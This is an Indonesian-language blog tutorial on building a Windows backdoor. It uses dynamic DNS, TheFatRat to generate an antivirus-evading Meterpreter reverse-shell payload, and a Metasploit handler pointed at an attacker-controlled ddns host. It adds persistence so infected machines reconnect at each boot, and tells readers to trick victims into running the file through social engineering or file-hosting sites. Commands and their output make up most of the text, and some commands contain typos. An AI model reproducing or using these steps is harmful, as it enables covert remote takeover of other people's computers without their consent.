Membuat Backdoor Untuk Windows 7/8/10 (EXTERNAL NETWORK + PERSISTENCE + FUD



saya akan mengajari Anda cara membuat payload yang sederhana, tetapi itu dapat membantu banyak orang yang memulai. 

Pertama kita akan membuat akun di NO-IP, untuk itu kita akan pergi http://www.noip.comdan membuat daftar kami. 
Setelah menyelesaikan pendaftaran kami, kami pergi ke tab DNS Dinamis dan klik pada Tambahkan nama host, di sini Anda akan memilih nama untuk dns Anda, misalnya saya akan membuat put-nubychan, klik tambahkan nama, dan itu akan tetap lebih atau kurang jadi "nubychan.ddns.net".

Sekarang kita perlu mengunduh NO-IP agar selalu memutakhirkan ip kita ketika kita me-restart router kita, pergi ke halaman utama NO-IP dan klik unduh, unduh dan masuk ke folder yang diunduh, buka terminal di tempat menulis


sudo make instal
dan tekan enter, Anda akan diminta untuk login dan kata sandi Anda, masuk dan tekan enter lagi. 

Dengan NO-IP dikonfigurasi, kita perlu mengunduh skrip TheFatRat, skrip ini yang akan membuat payload kita dan membiarkannya tidak terdeteksi. 
Buka terminal Anda dan tulis


git clone https://github.com/Screetsec/TheFatRat
itu akan mengunduh file, 
setelah unduhan selesai, masuk ke folder TheFatRat, di dalamnya buka folder setup, di folder ini Anda akan menemukan file bernama setup.sh, buka terminal dan tulis


sudo ./setup.sh
ini adalah bagian yang paling memakan waktu, ia akan membuka terminal lain dan itu akan membuat unduhan dependensi dan file yang diperlukan untuk operasi muatan, penting bahwa Anda menunggu sampai selesai. 

Setelah menyelesaikan proses instalasi dependensi, kembali ke folder Theatrat, buka terminal dan ketik

sudo bash ./fatrat
itu akan memeriksa apakah semua program yang diperlukan telah diinstal, ketika peringatan merah muncul di terminal Anda, cukup masukkan, tunggu, dan tekan enter lagi. 

Ada, kita akhirnya ke bagian di mana kita membuat payload kami, di sini kita akan memilih Buat Fud Backdoor 1000% dengan PwnWinds [Excelent] akan tekan 6 dan kami akan masuk dalam bagian ini kita akan memilih opsi pertama, Buat file bat + Powershell (FUD 100%), untuk ini tekan 1 dan beri masukkan. TheFatRat akan meminta Anda untuk memasukkan LHOST, di sini Anda akan memasukkan DNS Anda yang kami buat di NO-IP, dalam kasus saya forum-hacker.ddns.net

Segera setelah ia meminta Anda untuk mengatur pintu, di sini Anda dapat memilih port, tetapi penting untuk diingat bahwa pintu yang Anda pilih, Anda harus rilis pada router Anda, karena jika tidak, kita tidak akan dapat terhubung masa depan , dengan mengingat hal ini saya akan mendigitalkan 4444 pori dan mari masuk. 

Ini akan meminta Anda untuk memilih nama untuk file, saya akan menulis payload yang sama dan saya akan masuk pada waktu itu akan membuka jendela untuk Anda meminta untuk memilih payload yang ingin Anda gunakan, kita akan memilih Windows / meterpreter / reverse_tcp_dns press "OK" dan menunggu untuk itu untuk membuat payload, pada akhirnya ia akan menanyakan apakah Anda ingin berhenti, ketik ya dan tekan enter. 

Sekarang mari kita mulai mengkonfigurasi Metasploit kami untuk membuat koneksi balik, buka terminal dan ketik

sudo service postgresql start
dan masuk, kemudian mulai metasploit dengan perintah

msfconsole
masukkan dan tunggu sampai memuat. 

Ketika Metasploit terbuka, ketik
use exploit / multi / handler
dan masuk. 
Sekarang kita akan menulis


set PAYLOAD windows / meterpreter / reverse_tcp_dns
dan tekan enter lagi. 
Sesampai di sini kami akan menggunakan perintah

show options
untuk menunjukkan opsi, perhatikan bahwa di LPORT diatur ke port 4444 sebagai default, di sini Anda harus memilih port yang Anda pilih saat membuat payload, yang sama yang Anda rilis di router, jadi mari kita tulis

set LPORT XXXX
ganti X dengan port yang Anda inginkan. 
Sekarang mari setel DNS kami,

set LHOST nubychan.ddns.net
masukkan DNS yang Anda buat di NO-IP. 
Akhirnya, mari kita tulis.

set ExitOnSession falae
perintah ini akan menyebabkan sesi dengan target tidak berakhir jika kita menutup terminal kita. 

Sekarang kita menulis
exploit -j
dan kami berharap korban kami mengeksekusi payload, argumen "-j" untuk Metasploit dijalankan di latar belakang. 

Inilah bagian yang sulit, korban kita membutuhkan beberapa cara untuk menjalankan payload.bat kita, bagian itu terserah Anda, menggunakan keterampilan rekayasa sosial atau sesuatu, ingatlah bahwa payload ini tidak terdeteksi hampir semua antivirus, Anda Anda bisa menggunakannya di mediafire misalnya. 

Pokoknya, saat korban mengeksekusi payload kami, akan tampil lebih atau kurang dalam terminal 
[*] Sending stage (X bytes) to xxx.xxx.xx (IP KORBAN) [*] Meterpreter session 1 opened    (xxx.xxx. xx: xxx (IP ANDA: PORT) -> xxx.xxx.xx

Ketika ini muncul, itu berarti bahwa kita telah dapat menyerang, sekarang kita perlu memulai mode interaksi, dengan perintah


sesi -i 1

meterpreter> 

Oke, kita sudah berinteraksi dengan mesin target, untuk menguji, Anda bisa memberi perintah

sysinfo
ini akan mengembalikan informasi sistem target, dalam kasus saya, ketika saya melakukan tes di laboratorium, itu muncul. 

Komputer: 
OS LAB1-PC : Windows 7 (Build 7601, Service Pack 1). 
Arsitektur: x86 
Sistem Bahasa: en_US 
Domain: WORKGROUP 
Masuk Pada Pengguna: 2 
meterpreter: x86 / windows 

Akhirnya kami membuat kegigihan cara, sehingga setiap kali korban menyalakan komputer, terhubung ke kita, maka kita tidak akan kehilangan Sekarang, mari kita jalankan perintahnya

run percistence -U i 5 -p 4444 -r nubychan.ddns.net
Di tempat "4444" Anda akan mengganti dengan port Anda yang kami tinggalkan di awal, dan "forum-hacker.ddns.net" oleh DNS Anda dibuat di situs NO-IP. 

 Baca Juga : Cara Membuat Backdoor Yang Tidak Terdeteks Sofware Anti Virus




Post a Comment

0 Comments